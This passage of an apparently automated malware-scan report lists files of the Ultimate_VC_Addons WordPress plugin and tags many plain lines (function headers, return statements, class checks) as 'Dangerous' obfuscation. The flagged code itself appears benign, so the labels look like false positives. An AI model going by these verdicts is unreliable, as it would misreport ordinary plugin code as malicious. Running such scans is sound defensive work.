</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_margins_param</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 54</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_475").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Icon_Manager_Param.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 4.24 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_476" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_Icon_Manager_Param' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$ultimate_icon_manager_param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_Icon_Manager_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 23</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 38</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_manager</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 78</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 95</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_476").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Button.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.77 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 7</span><br><table id="file_477" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_Button_Param' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$ultimate_button_param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_Button_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">button_prev_param</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 72</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 82</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_477").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Select.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 2.64 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 6</span><br><table id="file_478" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_Select_Param' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$ultimate_select_param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_Select_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">select2_param</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 68</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_478").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Navigation.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.93 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 7</span><br><table id="file_479" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_Navigation' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$ultimate_navigation </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_Navigation</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 112</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_settings_field</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 73</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_479").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_DateTime_Picker.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 2.08 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 6</span><br><table id="file_480" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_DateTime_Picker_Param' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$ultimate_datetime_picker_param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_DateTime_Picker_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">datetimepicker</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_480").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Animator.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.57 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_481" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #0000BB">this</span><span style="color: #007700">).</span><span style="color: #0000BB">removeClass</span><span style="color: #007700">(); }); }); }); </</span><span style="color: #0000BB">script</span><span style="color: #007700">></span><span style="color: #DD0000">'; return $output; } } } if ( class_exists( '</span><span style="color: #0000BB">Ultimate_VC_Addons_Animator_Param</span><span style="color: #DD0000">' ) ) { $ultimate_animator_param = new Ultimate_VC_Addons_Animator_Param(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">animator_param</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 76</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 81</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #0000BB">this</span><span style="color: #007700">).</span><span style="color: #0000BB">removeClass</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 86</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_481").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_BoxShadow.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 6.80 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_482" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">get_units</span><span style="color: #007700">( </span><span style="color: #0000BB">$unit </span><span style="color: #007700">) { </span><span style="color: #0000BB">$html </span><span style="color: #007700">= </span><span style="color: #DD0000">'<div class="ultbs-unit">'</span><span style="color: #007700">; </span><span style="color: #0000BB">$html </span><span style="color: #007700">.= </span><span style="color: #DD0000">' <label>' </span><span style="color: #007700">. </span><span style="color: #0000BB">esc_html</span><span style="color: #007700">( </span><span style="color: #0000BB">$unit </span><span style="color: #007700">) . </span><span style="color: #DD0000">'</label>'</span><span style="color: #007700">; </span><span style="color: #0000BB">$html </span><span style="color: #007700">.= </span><span style="color: #DD0000">'</div>'</span><span style="color: #007700">; return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">ultimate_boxshadow_param_scripts</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) { if ( </span><span style="color: #DD0000">'post.php' </span><span style="color: #007700">== </span><span style="color: #0000BB">$hook </span><span style="color: #007700">||</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 123</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
